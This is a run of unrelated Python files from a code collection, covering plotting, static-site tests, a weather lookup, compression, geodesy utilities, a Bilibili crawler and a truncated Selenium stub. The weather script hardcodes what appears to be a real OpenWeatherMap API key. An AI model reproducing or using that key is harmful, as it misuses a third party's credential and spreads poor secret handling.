stuff for the legend\n    car_legend_array = []\n    for i in range(len(ex_hor_disp)):\n        car_legend_array.append(\"Car \"+str(i))\n    \n    \n    \n    plt.subplot(2,2,4)\n    plt.xlim(min_all-10,max_all+10)\n    plt.ylim(min_all-10,max_all+10)\n    for i in range(len(ex_hor_disp)):\n        plt.scatter([act_hor_disp[i]],[act_vert_disp[i]], marker = 'x', c = np.random.rand(3,))\n    plt.xlabel('x Displacement')\n    plt.ylabel('y Disp (m)') \n    plt.title('Actual')\n    plt.legend([x for x in car_legend_array])\n    plt.show()\n    \n\n    \n    \n    \n\n    \n    \n    \n    \n","sub_path":"Zhou_22465982,v.2.py","file_name":"Zhou_22465982,v.2.py","file_ext":"py","file_size_in_byte":7741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563612017","text":"import re\nimport pytest\nimport mock\nfrom piecrust.data.filters import (\n    PaginationFilter, HasFilterClause, IsFilterClause,\n    page_value_accessor)\nfrom piecrust.rendering import QualifiedPage, PageRenderingContext, render_page\nfrom piecrust.serving.util import find_routes\nfrom piecrust.sources.base import REALM_USER, REALM_THEME\nfrom .mockutil import mock_fs, mock_fs_scope\n\n\n@pytest.mark.parametrize('uri, route_specs, expected',\n        [\n            ('/',\n             [{'src': 'pages', 'pat': '(?P<path>.*)'}],\n             [('pages', {'path': '/'})]),\n            ('/',\n             [{'src': 'pages', 'pat': '(?P<path>.*)'},\n              {'src': 'theme', 'pat': '(?P<path>.*)', 'realm': REALM_THEME}],\n             [('pages', {'path': '/'}), ('theme', {'path': '/'})])\n            ])\ndef test_find_routes(uri, route_specs, expected):\n    routes = []\n    for rs in route_specs:\n        m = mock.Mock()\n        m.source_name = rs['src']\n        m.source_realm = rs.setdefault('realm', REALM_USER)\n        m.uri_re = re.compile(rs['pat'])\n        m.matchUri = lambda u: m.uri_re.match(u).groupdict()\n        routes.append(m)\n    matching = find_routes(routes, uri)\n\n    assert len(matching) == len(expected)\n    for i in range(len(matching)):\n        route, metadata, is_sub_page = matching[i]\n        exp_source, exp_md = expected[i]\n        assert route.source_name == exp_source\n        assert metadata == exp_md\n\n\n@pytest.mark.parametrize(\n    'tag, expected_indices',\n    [\n        ('foo', [1, 2, 4, 5, 6]),\n        ('bar', [2, 3, 4, 6, 8]),\n        ('whatever', [5, 8]),\n        ('unique', [7]),\n        ('missing', None)\n    ])\ndef test_serve_tag_page(tag, expected_indices):\n    tags = [\n        ['foo'],\n        ['foo', 'bar'],\n        ['bar'],\n        ['bar', 'foo'],\n        ['foo', 'whatever'],\n        ['foo', 'bar'],\n        ['unique'],\n        ['whatever', 'bar']]\n\n    def config_factory(i):\n        c = {'title': 'Post %d' % (i + 1)}\n        c['tags'] = list(tags[i])\n        return c\n\n    fs = (mock_fs()\n          .withConfig()\n          .withPages(8, 'posts/2015-03-{idx1:02}_post{idx1:02}.md',\n                     config_factory)\n          .withPage('pages/_tag.md', {'layout': 'none', 'format': 'none'},\n                    \"Pages in {{tag}}\\n\"\n                    \"{%for p in pagination.posts -%}\\n\"\n                    \"{{p.title}}\\n\"\n                    \"{%endfor%}\"))\n    with mock_fs_scope(fs):\n        app = fs.getApp()\n        page = app.getSource('pages').getPage({'slug': '_tag', 'tag': tag})\n        route = app.getGeneratorRoute('posts_tags')\n        assert route is not None\n\n        route_metadata = {'slug': '_tag', 'tag': tag}\n        qp = QualifiedPage(page, route, route_metadata)\n        ctx = PageRenderingContext(qp)\n        route.generator.prepareRenderContext(ctx)\n        rp = render_page(ctx)\n\n        expected = \"Pages in %s\\n\" % tag\n        if expected_indices:\n            for i in reversed(expected_indices):\n                expected += \"Post %d\\n\" % i\n        assert expected == rp.content\n\n\n@pytest.mark.parametrize(\n    'category, expected_indices',\n    [\n        ('foo', [1, 2, 4]),\n        ('bar', [3, 6]),\n        ('missing', None)\n    ])\ndef test_serve_category_page(category, expected_indices):\n    categories = [\n        'foo', 
'foo', 'bar', 'foo', None, 'bar']\n\n def config_factory(i):\n c = {'title': 'Post %d' % (i + 1)}\n if categories[i]:\n c['category'] = categories[i]\n return c\n\n fs = (mock_fs()\n .withConfig({\n 'site': {\n 'taxonomies': {\n 'categories': {'term': 'category'}\n }\n }\n })\n .withPages(6, 'posts/2015-03-{idx1:02}_post{idx1:02}.md',\n config_factory)\n .withPage('pages/_category.md', {'layout': 'none', 'format': 'none'},\n \"Pages in {{category}}\\n\"\n \"{%for p in pagination.posts -%}\\n\"\n \"{{p.title}}\\n\"\n \"{%endfor%}\"))\n with mock_fs_scope(fs):\n app = fs.getApp()\n page = app.getSource('pages').getPage({'slug': '_category',\n 'category': category})\n route = app.getGeneratorRoute('posts_categories')\n assert route is not None\n\n route_metadata = {'slug': '_category', 'category': category}\n qp = QualifiedPage(page, route, route_metadata)\n ctx = PageRenderingContext(qp)\n route.generator.prepareRenderContext(ctx)\n rp = render_page(ctx)\n\n expected = \"Pages in %s\\n\" % category\n if expected_indices:\n for i in reversed(expected_indices):\n expected += \"Post %d\\n\" % i\n assert expected == rp.content\n\n","sub_path":"tests/test_serving.py","file_name":"test_serving.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546501163","text":"#!/usr/bin/python3\n#writer: Abhishek Bishnoi\n# importing open weather msp library\nimport pyowm\n#api key to access api \nowm = pyowm.OWM('a3ac1a7d13422b804a326029769907f2')\n# this function returns all values \ndef common(city):\n global observation,weather,status,temperature,wind_speed,humidity,pressure\n observation = owm.weather_at_place(city)\n weather = observation.get_weather()\n status = weather.get_status()\n temperature = weather.get_temperature('celsius')['temp']\n wind_speed = weather.get_wind()['speed']\n humidity = weather.get_humidity()\n pressure = weather.get_pressure()['press']\n# this is used to get complete weather\ndef completeWeather(city):\n global wind_speed,status,temperature,humidity,pressure\n common(city)\n return \"The weather in \"+city+\" is \"+status+\" with temperature of \"+str(temperature)+\" degree Celsius \"+\"with wind speed of \"+str(wind_speed)+\" meter per second \"+\"and with humidity of \"+str(humidity)+\" %\"+\" and with \"+str(pressure)+\" Atmospheric pressure.\"\n# this function is used to know status about weather in a particular city\ndef statusWeather(city):\n global status\n common(city)\n return \"The weather in \"+city+\" is \"+status\n# this function is used to find temprature of a city \ndef tempWeather(city):\n global temperature\n common(city)\n return \"The temperature in \"+city+\" is \"+str(temperature)+\" degree Celsius\"\n# this function is used to find wind speed of any city \ndef wspeedWeather(city):\n global wind_speed\n common(city)\n return \"The wind speed in \"+city+\" is \"+str(wind_speed)+\" meter per second\"\n# this function is used to find humidity of any city\ndef humidityWeather(city):\n global humidity\n common(city)\n return \"The humidity in \"+city+\" is \"+str(humidity)+\"%\"\n# this function gives the value of pressure in city \ndef pressureWeather(city):\n global pressure\n common(city)\n return \"The pressure in \"+city+\" is \"+str(pressure)+\" Atmospheric 
pressure.\"\n","sub_path":"weather_search.py","file_name":"weather_search.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175764582","text":"from trees import *\nfrom vl_codes import *\nfrom adaptive_arithmetic import adaptive_arithmetic_encode\nfrom adaptive_huffman import adaptive_huff\nfrom adaptive_arithmetic import alphabet as alph\nimport arithmetic \nfrom itertools import groupby\nfrom json import dump\nfrom sys import argv\n\n\ndef camzip(method, filename, max_char):\n \n with open(filename, 'rb') as fin:\n x = fin.read()\n\n alphabet = ''\n \n frequencies = dict([(key, len(list(group))) for key, group in groupby(sorted(x))])\n n = sum([frequencies[a] for a in frequencies])\n p = dict([(a,frequencies[a]/n) for a in frequencies])\n\n if (method == 'huffman') or (method == 'shannon_fano'):\n if (method == 'huffman'):\n xt = huffman(p)\n c = xtree2code(xt)\n else:\n c = shannon_fano(p)\n xt = code2xtree(c)\n\n y = vl_encode(x, c)\n outfile = filename + '.cz' + method[0]\n\n elif method == 'arithmetic':\n y = arithmetic.encode(x,p)\n outfile = filename + '.cz' + method[0]\n\n elif method == 'adaptive_huffman':\n alphabet = alph(x, max_char)\n y = adaptive_huff(x, alphabet)\n outfile = filename + '.cz' + 'f'\n\n elif method == 'adaptive_arithmetic':\n alphabet = alph(x, max_char)\n y = adaptive_arithmetic_encode(x, alphabet) \n outfile = filename + '.cz' + 'r'\n\n else:\n raise NameError('Compression method %s unknown' % method)\n \n y = bytes(bits2bytes(y))\n\n with open(outfile, 'wb') as fout:\n fout.write(y)\n\n pfile = filename + '.czp'\n n = len(x)\n\n with open(pfile, 'w') as fp:\n dump(frequencies, fp)\n\n return alphabet\n\n##if __name__ == \"__main__\":\n## if (len(argv) != 3):\n## print('Usage: python %s compression_method filename\\n' % argv[0])\n## print('Example: python %s huffman hamlet.txt' % argv[0])\n## print('or: python %s shannon_fano hamlet.txt' % argv[0])\n## print('or: python %s arithmetic hamlet.txt' % argv[0])\n## exit()\n##\n## camzip(argv[1], argv[2])\n","sub_path":"3F7 FTR Folder/camzip2.py","file_name":"camzip2.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590983900","text":"# Dataset\ndataset_name = 'traffic' # Dataset name\ndataset_path = 'datasets/traffic/input' # Dataset path\ngt_path = 'datasets/traffic/groundtruth' # Ground truth path\nresults_path = 'datasets/traffic/results'\n\n# Input Images\nnr_images = 100\nfirst_image = '000950' # Fist image filename\nimage_type = 'jpg' # Input image type\ngt_image_type = 'png' # Ground truth image type\nresult_image_type = 'png'\n\n# Background Modelling\nalpha = 3.7627\nrho = 0.1578\n\nmodelling_method = 'adaptive' # adaptive, non-adaptive\ncolor_images = True # Use RGB, HSV color channels\ncolor_space = \"RGB\" # RGB, HSV\nevaluate_foreground = True\nevaluate_alpha_range = [0, 25] # range of alpha values\nevaluate_alpha_values = 100 # number of alpha values to evaluate\nevaluate_rho_range = [0, 1] # range of rho values\nevaluate_rho_values = 20 # number of rho values to evaluate\nfind_best_parameters = False\nplot_back_model = False\n\n# Foreground Modelling\nfour_connectivity = False\nAUC_area_filtering = False\t\t # Plot AUC vs P pixels\nP_pixels_range = [0, 1000] # range of P pixels\nP_pixels_values = 40\n\ntask_name = 'task3' # else task1, task2\nopening_strel = 'diagonal'\nopening_strel_size = 
10\nclosing_strel = 'diamond'\nclosing_strel_size = 10\narea_filtering = True\narea_filtering_P = 820\nshadow_remove = True\n\n# Save results\nsave_results = True # Save Log file\noutput_folder = 'results' # Output folder to save the results of the test\nsave_plots = True # Save the plots to disk\n","sub_path":"config/traffic_background.py","file_name":"traffic_background.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"47480258","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 11 20:09:58 2019\r\n\r\n@author: BIT1120172681\r\n\"\"\"\r\n\r\nFileNameOpen = r\"G:\\NamelessCotrunQuad_V1.0-master\\User\\new\\new.txt\"\r\nFileNameWrite = r\"G:\\NamelessCotrunQuad_V1.0-master\\User\\new\\new1.txt\"\r\n\r\nKeyStr = \"//\"\r\nFoundFlag = False\r\n\r\nFileObj = open(FileNameOpen, encoding='utf-8')\r\nFileWrite = open(FileNameWrite, \"w\")\r\n\r\nLineTemp = FileObj.readline()\r\n\r\nwhile LineTemp:\r\n if LineTemp.find(KeyStr) == 0:\r\n # print(LineTemp)\r\n FileWrite.write(LineTemp)\r\n LineTemp = FileObj.readline()\r\n else:\r\n LineTemp = FileObj.readline()\r\n \r\nFileObj.close()\r\nFileWrite.close()\r\n# input()\r\n","sub_path":"FileBatchProcessor/FileBatchProcessor_v1_0.py","file_name":"FileBatchProcessor_v1_0.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575052763","text":"\"\"\"Geodesy-related utility functions.\"\"\"\n\n\nfrom osgeo import gdal\nimport numpy as np\nimport pickle\nimport os\n\ngdal.UseExceptions()\n\n\n# Top of the troposphere\nzref = 15000\n\n\ndef sind(x):\n \"\"\"Return the sine of x when x is in degrees.\"\"\"\n return np.sin(np.radians(x))\n\n\ndef cosd(x):\n \"\"\"Return the cosine of x when x is in degrees.\"\"\"\n return np.cos(np.radians(x))\n\n\ndef tand(x):\n \"\"\"Return degree tangent.\"\"\"\n return np.tan(np.radians(x))\n\n\ndef lla2ecef(lat, lon, height):\n import pyproj\n ecef = pyproj.Proj(proj='geocent')\n lla = pyproj.Proj(proj='latlong')\n\n return pyproj.transform(lla, ecef, lon, lat, height)\n\n\ndef ecef2lla(x, y, z):\n import pyproj\n ecef = pyproj.Proj(proj='geocent')\n lla = pyproj.Proj(proj='latlong')\n lon, lat, height = pyproj.transform(ecef, lla, x, y, z)\n return lat, lon, height\n\n\ndef enu2ecef(east, north, up, lat0, lon0, h0):\n \"\"\"Return ecef from enu coordinates.\"\"\"\n # I'm looking at\n # https://github.com/scivision/pymap3d/blob/master/pymap3d/__init__.py\n x0, y0, z0 = lla2ecef(lat0, lon0, h0)\n\n t = cosd(lat0) * up - sind(lat0) * north\n w = sind(lat0) * up + cosd(lat0) * north\n\n u = cosd(lon0) * t - sind(lon0) * east\n v = sind(lon0) * t + cosd(lon0) * east\n\n my_ecef = np.stack((x0 + u, y0 + v, z0 + w))\n\n return my_ecef\n\n\ndef lla2lambert(lat, lon, height=None):\n import pyproj\n lla = pyproj.Proj(proj='latlong')\n lambert = pyproj.Proj(\n '+proj=lcc +lat_1=30.0 +lat_2=60.0 +lat_0=18.500015 +lon_0=-100.2 '\n '+a=6370 +b=6370 +towgs84=0,0,0 +no_defs')\n\n if height is None:\n return lla(lat, lon, errcheck=True)\n return pyproj.transform(lla, lambert, lat, lon, height)\n\n\ndef state_to_los(t, x, y, z, vx, vy, vz, lats, lons, heights):\n import Geo2rdr\n\n real_shape = lats.shape\n lats = lats.flatten()\n lons = lons.flatten()\n heights = heights.flatten()\n\n geo2rdr_obj = Geo2rdr.PyGeo2rdr()\n geo2rdr_obj.set_orbit(t, x, y, z, vx, vy, vz)\n\n loss = np.zeros((3, len(lats)))\n slant_ranges = 
np.zeros_like(lats)\n\n for i, (lat, lon, height) in enumerate(zip(lats, lons, heights)):\n height_array = np.array(((height,),))\n\n # Geo2rdr is picky about the type of height\n height_array = height_array.astype(np.double)\n\n geo2rdr_obj.set_geo_coordinate(np.radians(lon),\n np.radians(lat),\n 1, 1,\n height_array)\n # compute the radar coordinate for each geo coordinate\n geo2rdr_obj.geo2rdr()\n\n # get back the line of sight unit vector\n los_x, los_y, los_z = geo2rdr_obj.get_los()\n loss[:, i] = los_x, los_y, los_z\n\n # get back the slant ranges\n slant_range = geo2rdr_obj.get_slant_range()\n slant_ranges[i] = slant_range\n\n los = loss * slant_ranges\n\n # Have to think about traversal order here. It's easy, though, since\n # in both orders xs come first, followed by all ys, followed by all\n # zs.\n return los.reshape((3,) + real_shape)\n\n\ndef toXYZ(lats, lons, hts):\n \"\"\"Convert lat, lon, geopotential height to x, y, z in ECEF.\"\"\"\n # Convert geopotential to geometric height. This comes straight from\n # TRAIN\n g0 = 9.80665\n # Map of g with latitude (I'm skeptical of this equation)\n g = 9.80616*(1 - 0.002637*cosd(2*lats) + 0.0000059*(cosd(2*lats))**2)\n Rmax = 6378137\n Rmin = 6356752\n Re = np.sqrt(1/(((cosd(lats)**2)/Rmax**2) + ((sind(lats)**2)/Rmin**2)))\n\n # Calculate Geometric Height, h\n h = (hts*Re)/(g/g0*Re - hts)\n return lla2ecef(lats, lons, h)\n\n\ndef big_and(*args):\n result = args[0]\n for a in args[1:]:\n result = np.logical_and(result, a)\n return result\n\n\ndef gdal_open(fname, returnProj = False):\n if os.path.exists(fname + '.vrt'):\n fname = fname + '.vrt'\n try:\n ds = gdal.Open(fname, gdal.GA_ReadOnly)\n except:\n raise RuntimeError('File {} could not be opened'.format(fname))\n proj = ds.GetProjection()\n\n val = []\n for band in range(ds.RasterCount):\n b = ds.GetRasterBand(band + 1) # gdal counts from 1, not 0\n d = b.ReadAsArray()\n try:\n ndv = b.GetNoDataValue()\n d[d==ndv]=np.nan\n except:\n print('NoDataValue attempt failed*******')\n pass\n val.append(d)\n b = None\n ds = None\n\n if len(val) > 1:\n data = np.stack(val)\n else:\n data = val[0]\n\n if not returnProj:\n return data\n else:\n return data, proj\n\n\ndef pickle_load(f):\n with open(f, 'rb') as fil:\n return pickle.load(fil)\n\ndef pickle_dump(o, f):\n with open(f, 'wb') as fil:\n pickle.dump(o, fil)\n\n\ndef writeArrayToRaster(array, filename, noDataValue = 0, fmt = 'ENVI', proj = None, gt = None):\n # write a numpy array to a GDAL-readable raster\n import gdal\n import numpy as np\n array_shp = np.shape(array)\n dType = array.dtype\n if 'complex' in str(dType):\n dType = gdal.GDT_CFloat32\n elif 'float' in str(dType):\n dType = gdal.GDT_Float32\n else:\n dType = gdal.GDT_Byte\n\n driver = gdal.GetDriverByName(fmt)\n ds = driver.Create(filename, array_shp[1], array_shp[0], 1, dType)\n if proj is not None:\n ds.SetProjection(proj)\n if gt is not None:\n ds.SetGeoTransform(gt)\n b1 = ds.GetRasterBand(1)\n b1.WriteArray(array)\n b1.SetNoDataValue(noDataValue)\n ds = None\n b1 = None\n\n\ndef writeArrayToFile(lats, lons, array, filename, noDataValue = -9999):\n '''\n Write a single-dim array of values to a file\n '''\n array[np.isnan(array)] = noDataValue\n with open(filename, 'w') as f:\n f.write('Lat,Lon,DEM_hgt_m\\n')\n for l, L, a in zip(lats, lons, array):\n f.write('{},{},{}\\n'.format(l, L, a))\n \n\ndef round_date(date, precision):\n import datetime\n # First try rounding up\n # Timedelta since the beginning of time\n datedelta = datetime.datetime.min - date\n # Round 
that timedelta to the specified precision\n    rem = datedelta % precision\n    # Add back to get date rounded up\n    round_up = date + rem\n\n    # Next try rounding down\n    datedelta = date - datetime.datetime.min\n    rem = datedelta % precision\n    round_down = date - rem\n\n    # It's not the most efficient to calculate both and then choose, but\n    # it's clear, and performance isn't critical here.\n    up_diff = round_up - date\n    down_diff = date - round_down\n\n    return round_up if up_diff < down_diff else round_down\n\n\ndef _least_nonzero(a):\n    \"\"\"Fill in a flat array with the lowest nonzero value.\n    \n    Useful for interpolation below the bottom of the weather model.\n    \"\"\"\n    out = np.full(a.shape[:2], np.nan)\n    xlim, ylim, zlim = np.shape(a)\n    for x in range(xlim):\n        for y in range(ylim):\n            for z in range(zlim):\n                val = a[x][y][z]\n                if not np.isnan(val):\n                    out[x][y] = val\n                    break\n    return out\n\n\ndef robmin(a):\n    '''\n    Get the minimum of an array, accounting for empty lists\n    '''\n    from numpy import nanmin as min\n    try:\n        return min(a)\n    except ValueError:\n        return 'N/A'\n\ndef robmax(a):\n    '''\n    Get the maximum of an array, accounting for empty lists\n    '''\n    from numpy import nanmax as max\n    try:\n        return max(a)\n    except ValueError:\n        return 'N/A'\n\n\ndef _get_g_ll(lats):\n    '''\n    Compute the variation in gravity constant with latitude\n    '''\n    #TODO: verify these constants. In particular why is the reference g different from self._g0?\n    return 9.80616*(1 - 0.002637*cosd(2*lats) + 0.0000059*(cosd(2*lats))**2)\n\ndef _get_Re(lats):\n    '''\n    Returns the ellipsoid as a fcn of latitude\n    '''\n    #TODO: verify constants, add to base class constants? \n    Rmax = 6378137\n    Rmin = 6356752\n    return np.sqrt(1/(((cosd(lats)**2)/Rmax**2) + ((sind(lats)**2)/Rmin**2)))\n\n
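# Rough sanity check of _geo_to_ht below (illustrative numbers of mine, not\n# from the original source): at the equator a 10 km geopotential height maps\n# to about 10.04 km geometric height, e.g. _geo_to_ht(np.array([0.]), np.array([10000.])).\n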
def _geo_to_ht(lats, hts, g0 = 9.80556):\n    \"\"\"Convert geopotential height to altitude.\"\"\"\n    # Convert geopotential to geometric height. This comes straight from\n    # TRAIN\n    # Map of g with latitude (I'm skeptical of this equation - Ray)\n    g_ll = _get_g_ll(lats)\n    Re = _get_Re(lats)\n\n    # Calculate Geometric Height, h\n    h = (hts*Re)/(g_ll/g0*Re - hts)\n\n    return h\n\n\ndef padLower(invar):\n    '''\n    add a layer of data below the lowest current z-level at height zmin\n    '''\n    new_var = _least_nonzero(invar)\n    return np.concatenate((new_var[:,:,np.newaxis], invar), axis =2)\n\n\ndef testArr(arr, thresh, ttype):\n    '''\n    Helper function for checking heights\n    '''\n    if ttype=='g':\n        test = np.all(arr>thresh)\n    elif ttype =='l':\n        test = np.all(arr<thresh)\n    else:\n        raise ValueError('ttype must be one of \"g\" or \"l\"')\n    return test\n\n\ndef chunked(iterable, n):\n    \"\"\"Divide an iterable into n chunks.\n\n    Examples:\n    >>> l = [1, 2, 3, 4]\n    >>> list(chunked(l, 4))\n    [[1], [2], [3], [4]]\n\n    >>> l = [1, 2, 3]\n    >>> list(chunked(l, 4))\n    [[1], [2], [3], []]\n\n    >>> l = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n    >>> list(chunked(l, 4))\n    [[1, 2, 3], [4, 5, 6], [7, 8, 9], [10]]\n\n    \"\"\"\n    import math\n    chunksize = int(math.ceil(len(iterable) / n))\n    return (iterable[i * chunksize:i * chunksize + chunksize]\n            for i in range(n))\n\n\ndef makeDelayFileNames(time, los,outformat, weather_model_name, out):\n    '''\n    return names for the wet and hydrostatic delays\n    '''\n    str1 = time.isoformat() + \"_\" if time is not None else \"\"\n    str2 = \"z\" if los is None else \"s\" \n    str3 = 'td.{}'.format(outformat)\n    hydroname, wetname = (\n        '{}_{}_'.format(weather_model_name, dtyp) + str1 + str2 + str3\n        for dtyp in ('hydro', 'wet'))\n\n    hydro_file_name = os.path.join(out, hydroname)\n    wet_file_name = os.path.join(out, wetname)\n    return wet_file_name, hydro_file_name\n\n\ndef mkdir(dirName):\n    try:\n        os.mkdir(dirName)\n    except FileExistsError: \n        pass\n\ndef writeLL(time, lats, lons, llProj, weather_model_name, out):\n    '''\n    If the weather model grid nodes are used, write the lat/lon values\n    out to a file\n    '''\n    from datetime import datetime as dt\n    lonFileName = '{}_Lon_{}.dat'.format(weather_model_name, \n                  dt.strftime(time, '%Y_%m_%d_T%H_%M_%S'))\n    latFileName = '{}_Lat_{}.dat'.format(weather_model_name, \n                  dt.strftime(time, '%Y_%m_%d_T%H_%M_%S'))\n\n    mkdir('geom')\n\n    writeArrayToRaster(lons, os.path.join(out, 'geom', lonFileName))\n    writeArrayToRaster(lats, os.path.join(out, 'geom', latFileName))\n\n    return latFileName, lonFileName\n\n\ndef checkShapes(los, lats, lons, hgts):\n    '''\n    Make sure that by the time the code reaches here, we have a\n    consistent set of line-of-sight and position data. \n    '''\n    from utils.constants import Zenith\n    test1 = hgts.shape == lats.shape == lons.shape\n    try:\n        test2 = los.shape[:-1] != hgts.shape\n    except AttributeError:\n        test2 = los is not Zenith\n\n    if not test1 or test2:\n        raise ValueError(\n            'I need lats, lons, heights, and los to all be the same shape. ' +\n            'lats had shape {}, lons had shape {}, '.format(lats.shape, lons.shape)+\n            'heights had shape {}, and los was not Zenith'.format(hgts.shape))\n\n\ndef checkLOS(los, raytrace, Npts):\n    '''\n    Check that los is either: \n    (1) Zenith,\n    (2) a set of scalar values of the same size as the number \n        of points, which represent the projection value), or\n    (3) a set of vectors, same number as the number of points. \n    '''\n    from utils.constants import Zenith\n    # los can either be a bunch of vectors or a bunch of scalars. If\n    # raytrace, then it's vectors, otherwise scalars. 
(Or it's Zenith)\n    if los is not Zenith:\n        if raytrace:\n            los = los.reshape(-1, 3)\n        else:\n            los = los.flatten()\n\n    if los is not Zenith and los.shape[0] != Npts:\n        raise RuntimeError('Found {} line-of-sight values and only {} points'\n                           .format(los.shape[0], Npts))\n    return los\n\n\n\ndef readLLFromStationFile(fname):\n    '''\n    Helper fcn for checking argument compatibility\n    '''\n    try:\n        import pandas as pd\n        stats = pd.read_csv(fname)\n        return stats['Lat'].values,stats['Lon'].values\n    except:\n        lats, lons = [], []\n        with open(fname, 'r') as f:\n            for i, line in enumerate(f): \n                if i == 0:\n                    continue\n                lat, lon = [float(f) for f in line.split(',')[1:3]]\n                lats.append(lat)\n                lons.append(lon)\n        return lats, lons\n\n    \ndef mangle_model_to_module(model_name):\n    \"\"\"Turn an arbitrary string into a module name.\n\n    Takes as input a model name, which hopefully looks like ERA-I, and\n    converts it to a module name, which will look like erai. It doesn't\n    always produce a valid module name, but that's not the goal. The\n    goal is just to handle common cases.\n    \"\"\"\n    return 'models.' + model_name.lower().replace('-', '')\n\n\ndef gdal_trans(f1, f2, fmt = 'VRT'):\n    '''\n    translate a file from one location to another using GDAL\n    '''\n    ds1 = gdal.Open(f1)\n    if ds1 is None:\n        raise RuntimeError('Could not open the file {}'.format(f1))\n    ds2 = gdal.Translate(f2, ds1, format = fmt)\n    if ds2 is None:\n        raise RuntimeError('Could not translate the file {} to {}'.format(f1, f2))\n    ds1 = None\n    ds2 = None\n\n\ndef isOutside(extent1, extent2):\n    '''\n    Determine whether any of extent1 lies outside extent2\n    extent1/2 should be a list containing [lower_lat, upper_lat, left_lon, right_lon]\n    '''\n    t1 = extent1[0] < extent2[0]\n    t2 = extent1[1] > extent2[1]\n    t3 = extent1[2] < extent2[2]\n    t4 = extent1[3] > extent2[3]\n    if np.any([t1, t2, t3, t4]):\n        return True\n    return False\n\n\ndef getExtent(lats, lons=None, shrink=None):\n    '''\n    get the bounding box around a set of lats/lons\n    '''\n    if lons is None:\n        ds = gdal.Open(lats, gdal.GA_ReadOnly)\n        trans = ds.GetGeoTransform()\n        # W E S N\n        extent = [trans[0], trans[0] + ds.RasterXSize * trans[1],\n                  trans[3] + ds.RasterYSize*trans[5], trans[3]]\n        if shrink is not None:\n            delW, delE, delS, delN = shrink\n            extent = [extent[0] + delW, extent[1] - delE, extent[2] + delS, extent[3] - delN]\n        del ds\n        return extent\n    \n    else:\n        return [np.nanmin(lats), np.nanmax(lats), np.nanmin(lons), np.nanmax(lons)]\n\n\ndef setLLds(infile, latfile, lonfile):\n    '''\n    Use a lat/lon file to set the x/y coordinates of infile\n    ''' \n    from osgeo import gdal, osr\n    ds = gdal.Open(infile, gdal.GA_ReadOnly)\n    ds.SetMetadata({'X_DATASET': os.path.abspath(latfile), 'X_BAND': '1',\n                    'Y_DATASET': os.path.abspath(lonfile), 'Y_BAND': '1'})\n\n    srs = osr.SpatialReference()\n    srs.ImportFromEPSG(4326)\n    ds.SetProjection(srs.ExportToWkt())\n    del ds \n\n","sub_path":"tools/RAiDER/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":15648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225966315","text":"import requests\nimport json\nimport os\n\n\ndef crawling(uid,path_collect_data):\n    os.chdir(path_collect_data)\n    # Request headers\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'\n    }\n\n    # First crawl: fetch the ids of all favorite folders\n    url = 'https://api.bilibili.com/x/v3/fav/folder/created/list-all'\n    params = {\n        'up_mid': uid,  # your own account's UID\n        'jsonp': 'jsonp',\n    }\n    response = requests.get(url=url, params=params, headers=headers)\n
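    # Defensive aside (my addition, not in the original script): requests does\n    # not raise on HTTP error statuses by itself, so response.raise_for_status()\n    # before calling .json() is the usual guard here.\n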
    assign = response.json()\n    with open('收藏夹id.json', 'w', encoding='utf-8')as fp:\n        json.dump(assign, fp, ensure_ascii=False)\n        print('收藏夹id爬取成功')\n\n    # Second crawl: fetch each favorite folder's json data\n    url = 'https://api.bilibili.com/x/v3/fav/resource/list'\n    # Base params; pn and media_id are added per folder below\n    params = {\n        'ps': 20,\n        'keyword': '',\n        'order': 'mtime',\n        'type': 0,\n        'tid': 0,\n        'platform': 'web',\n        'jsonp': 'jsonp'\n    }\n    with open('收藏夹id.json', 'r', encoding='utf-8')as fp:\n        file = json.load(fp)\n        data = file['data']\n        list = data['list']\n        # Iterate over all favorite folders\n        for i in list:\n            os.chdir(path_collect_data)\n            path = i['title']\n\n            if not os.path.exists(path):\n                os.makedirs(path)\n\n            os.chdir(path)\n\n            # Start the second crawl\n            params['pn'] = 1\n            while (params['pn'] < (i['media_count'] / 20 + 1)):\n                with open(i['title'] + str(params['pn']) + '.json', 'w', encoding='utf-8')as f:\n                    print('爬取中: 当前爬取'+os.getcwd()+str(params['pn']))\n                    params['media_id'] = i['id']\n                    result = requests.get(url=url, params=params, headers=headers)\n                    assign = result.json()\n                    json.dump(assign, f, ensure_ascii=False)\n                    params['pn'] += 1\n            print('收藏夹'+i['title']+'信息爬取完毕!')\n    print('所有收藏夹爬取完毕!!!')\n","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499541211","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport time, re\nfrom at_test_lib import * \nfrom datetime import datetime\n\nbrowser_driver = None\nglobal_browser = None\n\nimport unittest\n\t\t\t\t\t\t\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--browser', default='firefox',metavar='firefox',type=str,help='firefox/chrome/ie/opera/remote')\n\tparser.add_argument('--logroot', default=cur_dir()+'\\\\log\\\\',type=str,help='root of logfiles')\n\tparser.add_argument('--loglevel', default='info',type=str,help='debug/info/warning/error/critical')\n\tparser.add_argument('--pagetimeout', default=10,type=int,help='how long a page can load before considered 